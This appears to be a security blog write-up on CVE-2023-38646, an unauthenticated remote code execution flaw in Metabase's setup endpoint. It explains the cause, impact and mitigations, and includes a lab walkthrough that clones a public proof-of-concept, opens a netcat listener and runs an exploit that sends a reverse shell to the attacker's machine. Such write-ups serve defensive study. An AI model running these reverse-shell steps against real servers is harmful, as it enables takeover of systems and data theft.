Unmasking CVE-2023–38646: Analyzing the Critical Metabase Security Vulnerability and Its Implications
Summary
Researchers discovered that many Metabase instances exposed their setup tokens, which should be removed after setup. They traced the issue to a January 2022 code change that inadvertently retained the tokens due to a refactoring error. This vulnerability primarily affected instances set up after the change. Exploiting the flaw, they used the setup phase to execute code by abusing JDBC drivers, initially targeting the H2 database’s INIT parameter and later finding a SQL injection vulnerability in the H2 driver. This allowed them to execute arbitrary code. To avoid damaging databases or the application, they used a sample H2 database from Metabase’s JAR file. Patching should address these code issues and enhance security practices.
Description
INTRODUCTION:
Metabase, a popular business intelligence and data visualization tool, has been found to have a critical security flaw, CVE-2023–38646, which allows attackers to execute server-level commands without needing authentication. This article provides an analysis of the vulnerability, including how it can be reproduced and ways to mitigate it. The issue originates from a JDBC connection problem in the “/api/setup/validate” pre-auth API endpoint. By exploiting this, remote code execution can be achieved. We strongly advise all Metabase users to upgrade to the latest version immediately. If an immediate upgrade is not possible, consider blocking requests to “/api/setup” endpoints as a temporary security measure. The seriousness of this vulnerability requires swift action to protect your systems and data.
What is Matabase?
Metabase is a widely-used open-source business intelligence platform that empowers users to analyze and visualize their data effortlessly. It simplifies complex data queries and reporting, making it accessible for non-technical users. Metabase connects to various data sources, creating interactive dashboards, charts, and reports for data-driven decision-making. It’s known for its user-friendly interface, making data exploration and analysis more intuitive. Metabase benefits organizations by promoting data-driven insights and facilitating informed decision-making processes across various industries, from startups to large enterprises. Its versatility and community support make it a valuable tool for those seeking to harness the power of their data.
What is RCE?
Remote Code Execution (RCE) is a critical cybersecurity threat where an attacker, often from a remote location, gains unauthorized access to a system or application and can execute malicious code. This exploitation can lead to complete control over the compromised system, enabling actions like data theft, system manipulation, or the deployment of malware. RCE vulnerabilities typically result from insufficient input validation or flawed security measures, making them a top concern for organizations and security professionals. Preventing RCE involves rigorous code review, software patching, and implementing strong security practices to thwart potential attacks and safeguard sensitive data and infrastructure.
Impact :
The impact of the vulnerability (CVE-2023–38646) in Metabase, which allowed attackers to execute arbitrary commands on the server without requiring authentication, is significant:
1. Unauthorized Server Access:
Attackers can gain full control over the server without the need for authentication.
2. Data Exposure:
They can access, manipulate, or steal sensitive data, which can lead to data breaches.
3. System Compromise:
Unauthorized access to the server at the highest privilege level can compromise the entire system, potentially disrupting services and operations.
4. Malicious Activity:
Attackers can carry out malicious activities on the server, such as deploying malware or launching additional attacks.
5. Reputation Damage:
Security incidents stemming from this vulnerability can harm an organization’s reputation and erode trust.
6. Regulatory Consequences:
Depending on the nature of the data and applicable regulations, there may be legal and regulatory repercussions.
It allows attackers to take control of the server and potentially cause data breaches, system disruptions, and reputational damage, underscoring the importance of timely patching and proactive security measures.
Lab Setup:
To set up a lab we are going to use metabase:v0.44.6.1’s Docker image
To download it first of all make sure you have docker installed in your system, If not you may download it by typing following in terminal.
apt-get install docker.io -y
once done type following command to dwonload Docker image of Metabase
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.44.6.1
once done It will check for local image and if not available it will download it for you.
you can use docker ps command to list the running Docker containers on your system
now search ip with assigned port in browser, it will open Metabase for you and do normal setup.
Now open burpsuite and connect it with your browser,
once done your lab setup is done and you are ready to attack.
Testing Vulnerablity:
For testing this vulnerablity we are going to use the pre-relesed PoC (https://github.com/threatHNTR/CVE-2023-38646)
Process is bit complicated so try to follow steps correctly:
Step 1
open terminal and write git clone https://github.com/threatHNTR/CVE-2023-38646 to download poc
Clone this Repository
git clone https://github.com/threatHNTR/CVE-2023-38646.gitNavigate to the Repository
cd CVE-2023-38646Before running the script, set Up a Netcat Listener
nc -nlvp chosen-portRun the Script
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-portExploitation: The script will attempt to send a reverse shell to the target Metabase server. If successful, you will receive a shell on your machine. Feel free to change the payload to try different reverse shells.
Vulnerablity analysis:
1. Setup Token Exposure: The researchers observed that many Metabase instances online did not have the setup token exposed. This token is used during the setup process and is typically expected to be removed after setup is complete. However, they found instances where this token was still present.
2. Root Cause Investigation: To understand why some instances retained the setup token, the researchers analyzed the Metabase codebase and went through historical commits.
3. Discovery of a Clue: They identified a specific commit made in January 2022 (commit link provided) that was responsible for changes in the setup flow. This commit seemed to be the root cause of the issue.
4. Refactoring and Token Removal: Based on their understanding, the researchers noted that the codebase refactoring resulted in the critical part of the setup flow being deleted, which caused the setup token to persist.
5. Caveat: The vulnerability was introduced for instances set up after the January 2022 commit. Older instances remained unaffected.
6. Exploitation: To exploit the vulnerability, they leveraged the setup phase, which required connecting to a datasource/database. They used a JDBC URI in the /api/setup/validate endpoint for code execution.
7. JDBC Drivers: The researchers exploited the vulnerability by abusing JDBC drivers. They attempted to use the H2 database INIT parameter for code execution but found it had been patched. Instead, they discovered a SQL injection vulnerability within the H2 database driver.
8. SQL Injection: By using the TRACE_LEVEL_SYSTEM_OUT argument and stacking SQL queries, they achieved arbitrary code execution.
9. Selecting the H2 Database: The researchers found a sample H2 database within Metabase’s JAR file and used a zip URI to avoid corrupting any databases or the application.
Patch Analysis:
The researchers discovered the vulnerability in Metabase’s setup flow, which allowed them to persist the setup token and, in some instances, achieve code execution. They provided a detailed account of the steps they took to exploit the vulnerability.
To patch this vulnerability, Metabase should address the root cause, which is the refactoring that allowed the setup token to persist. This may involve re-implementing the setup flow to ensure the token is properly removed after setup. Additionally, any SQL injection vulnerabilities should be patched in the H2 database driver to prevent similar exploitation.
Conclusion:
I am concluding this here as no Patch details are available and nucli detaction templates are also under development.
once any new details will be out I will share via general post or update this report, till then stay tuned…….
